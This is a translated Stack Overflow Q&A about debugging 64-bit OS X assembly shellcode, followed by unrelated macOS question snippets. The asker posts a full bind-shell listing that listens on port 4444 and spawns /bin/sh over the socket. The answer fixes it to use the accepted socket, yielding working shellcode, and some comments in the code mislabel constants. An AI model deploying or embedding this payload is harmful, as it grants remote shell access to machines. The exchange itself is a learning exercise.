个人中心
文章发布
退出
作者热门文章
- android - RelativeLayout 背景可绘制重叠内容
- android - 如何链接 cpufeatures lib 以获取 native android 库?
- java - OnItemClickListener 不起作用,但 OnLongItemClickListener 在自定义 ListView 中起作用
- java - Android 文件转字符串
26
4
一直在尝试学习 osx 上的一些 64 位汇编程序,并认为移植反向 tcp shell 代码是一个很好的练习。然后程序编译和链接运行良好并监听给定的端口 4444,但随后我尝试连接 nc -nv 127.0.0.1 4444 shell_code 成功终止并且返回给 nc 的响应是:连接127.0.0.1 4444端口[tcp/*]成功!
它被编译并链接到:
nasm -g -f macho64 bindshell.s
ld -arch x86_64 -macosx_version_min 10.7.0 -lSystem -o bindshell bindshell.o
(nasm -v NASM version 2.11.02 compiled on Feb 19 2014)
uname -a
Darwin MacBook-Pro.local 12.4.0 Darwin Kernel Version 12.4.0: Wed May 1 17:57:12 PDT 2013; root:xnu-2050.24.15~1/RELEASE_X86_64 x86_64
一直在尝试调试它并查看寄存器和内存,但看不出缺少什么,64 位汇编程序的新手。使用的代码是:
BITS 64
section .text
global start
start:
jmp runsh
start_shell:
dd '/bin//sh', 0
runsh:
lea r14, [rel start_shell] ; get address of shell
mov rax, 0x2000061 ; call socket(SOCK_STREAM, AF_NET, 0);
mov rdi, 2 ; SOCK_STREAM = 2
mov rsi, 1 ; AF_NET = 1
xor rdx, rdx ; protocol, set to 0
syscall
mov r12, rax ; save socket from call
sock_addr:
xor r8, r8 ; clear the value of r8
push r8 ; push r8 to the stack as it's null (INADDR_ANY = 0)
push WORD 0x5C11 ; push our port number to the stack (Port = 4444)
push WORD 2 ; push protocol argument to the stack (AF_INET = 2)
mov r13, rsp ; Save the sock_addr_in into r13
;bind
mov rax, 0x2000068 ; bind(sockfd, sockaddr, addrleng);
mov rdi, r12 ; sockfd from socket syscall
mov rsi, r13 ; sockaddr
mov rdx, 16 ; addrleng the ip address length
syscall
;listen
mov rax, 0x200006A ; int listen(sockfd, backlog);
mov rdi, r12 ; sockfd
xor rsi, rsi ; backlog
syscall
;accept
mov rax, 0x200001E ; int accept(sockfd, sockaddr, socklen);
mov rdi, r12 ; sockfd
xor rsi, rsi ; sockaddr
xor rdx, rdx ; socklen
syscall
dup:
; dup2 for stdin, stdout and stderr
mov rax, 0x200005A ; move the syscall for dup2 into rax
mov rdi, r12 ; move the FD for the socket into rdi
syscall ; call dup2(rdi, rsi)
cmp rsi, 0x2 ; check to see if we are still under 2
inc rsi ; inc rsi
jbe dup ; jmp if less than 2
;execve
mov rax, 0x200003B ; execve(char *fname, char **argp, char **envp);
mov rdi, r14 ; set the address to shell
xor rsi, rsi
xor rdx, rdx
run_cmd: ; using as break point
syscall
最佳答案
你离我很近。问题的关键在于,当您尝试 dup 时,您使用的是 listen 套接字,而不是 accept 套接字。这是您真正想要通信的 accept 套接字。
例如,这是你拥有的:
;accept
mov rax, 0x200001E ; int accept(sockfd, sockaddr, socklen);
mov rdi, r12 ; sockfd
xor rsi, rsi ; sockaddr
xor rdx, rdx ; socklen
syscall
dup:
; dup2 for stdin, stdout and stderr
mov rax, 0x200005A ; move the syscall for dup2 into rax
mov rdi, r12 ; move the FD for the socket into rdi
syscall ; call dup2(rdi, rsi)
cmp rsi, 0x2 ; check to see if we are still under 2
inc rsi ; inc rsi
jbe dup ; jmp if less than 2
这就是您所需要的(查看第一个 syscall 之后的行):
;accept
mov rax, 0x200001E ; int accept(sockfd, sockaddr, socklen);
mov rdi, r12 ; sockfd
xor rsi, rsi ; sockaddr
xor rdx, rdx ; socklen
syscall
mov r12, rax ; use the accept socket from here
dup:
; dup2 for stdin, stdout and stderr
mov rax, 0x200005A ; move the syscall for dup2 into rax
mov rdi, r12 ; move the FD for the socket into rdi
syscall ; call dup2(rdi, rsi)
cmp rsi, 0x2 ; check to see if we are still under 2
inc rsi ; inc rsi
jbe dup ; jmp if less than 2
希望对您有所帮助!欧杰
关于macos - osx x64 反向 tcp shell 代码程序成功终止,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/23442863/
26
4
0
在跨平台应用程序中,我正在使用一个配置文件,允许用户根据需要覆盖各种默认值。 我的问题是...在哪里放置/查找此配置文件,尤其是关于 MacOS X(我从未使用过且无法访问)?我知道 MacOS X
由于Xcode的代码签名和存档非常耗时,枯燥且有问题,因此我一直通过自己的脚本使用命令行工具xcodebuild,codesign等对我的开发人员ID签名的macOS应用进行代码签名,存档和交付。公证
我正在寻找一种在 MacOs 应用程序中以编程方式逐帧绘制动画的方法(不是关键帧属性动画)。我尝试使用drawLayer:inContext:委托(delegate)方法绘制到CALayers,调用s
就目前情况而言,这个问题不太适合我们的问答形式。我们希望答案得到事实、引用资料或专业知识的支持,但这个问题可能会引发辩论、争论、民意调查或扩展讨论。如果您觉得这个问题可以改进并可能重新开放,visit
我在83%的安装openCV中遇到问题...我的python是2.7.3。我已经适应了xcode。我使用了这个tuturial。 我的Cmake: cmake -D CMAKE_BUILD_TYPE=
我需要弄清楚 Mac 的日志键的键码(ctrl、shift 等)或者需要知道如何跟踪这个日志按键事件... 基本上我正在将 mac key 代码转换为等效的 Windows key 代码......我
关闭。这个问题不满足Stack Overflow guidelines .它目前不接受答案。 想改善这个问题吗?更新问题,使其成为 on-topic对于堆栈溢出。 2年前关闭。 Improve thi
我想将一个 Rust 程序从我的 x86 Mac 交叉编译成一个可以在 Silicon Mac 上运行的二进制文件,但我无法弄清楚链接。 我有: 运行 macOS 10.15.7 Catalina 的
在 macOS ventura 中,我无法复制我的终端应用程序。 我想这样做,因为我有一个 M1 处理器,我想要一个使用 Rosetta2 打开的处理器和一个本地打开的处理器。 有什么办法解决这个问题
当您可以访问实际硬件时,在 Mac 上以安全模式启动是很容易的。您只需在启动时按住 shift 键即可。 在虚拟机中运行 macOS (OSX) 时如何启动到安全模式? 最佳答案 Schmitty 在
这个问题在这里已经有了答案: How to get Conda and Virtualenv to work on mac OS Catalina? (8 个答案) 关闭 3 年前。 我在 macO
我有一个关于 macOS 应用程序图标的问题。我以前看过很多动画图标,但从来没有真正密切关注正在发生的事情/他们是如何做的。我只是想知道是否有任何方法可以创建在停靠栏中动画的动画应用程序图标。 例如:
每当我在 vim 中输入终端命令(例如,!echo hello)时,我会立即被踢出去查看该终端命令的结果,然后提示我使用 按 ENTER 或键入命令继续。这有点刺耳。我想留在 vim 中,并在底部打印
当使用文本编辑应用程序时,选择一种字体(例如“Menlo”)来呈现字形,当所选字体不包含特殊字形(例如“𠹷”,它是一个简单的中文字形,“Menlo"不包含它), 应用程序会选择一种字体来呈现它, 在
已经有几个关于如何在 Mac 上启用虚拟化的问题(例如 How to enable support of CPU virtualization on Macbook Pro?)。经常报告 sysctl
这只是出于好奇。 Exposé 有两个功能,其中一个是重新排列桌面上的窗口,一个是显示所有打开的窗口,这样用户可以看到隐藏在其他窗口下面的窗口,另一个功能是将所有窗口移到两侧,让用户与桌面交互。 我只
我使用的是 MacOS X,我对应用程序包类型的东西还很陌生。我正在编写一个程序来打开一个窗口并注册鼠标输入——而不是一个命令行工具。当我将我的代码(用 C 编写,如果这很重要)编译成一个可执行文件(
我正在制作一个必须支持 macOS 的 Flutter 插件。但是,当我想创建一个插件并在示例应用程序中运行该插件时(即使我还没有编辑过 Flutter 生成的代码),Xcode 会抛出以下错误。 无
关闭。这个问题不满足Stack Overflow guidelines .它目前不接受答案。 想改善这个问题吗?更新问题,使其成为 on-topic对于堆栈溢出。 7年前关闭。 Improve thi
我想在终端(MacOs)中像屏幕一样显示当前目录面包屑: 我该怎么做? 现在它只是一个文本...... 谢谢 最佳答案 首选项 -> 窗口 -> 检查工作目录或文档下的“路径”。 路径将作为窗口标题的
我是一名优秀的程序员,十分优秀!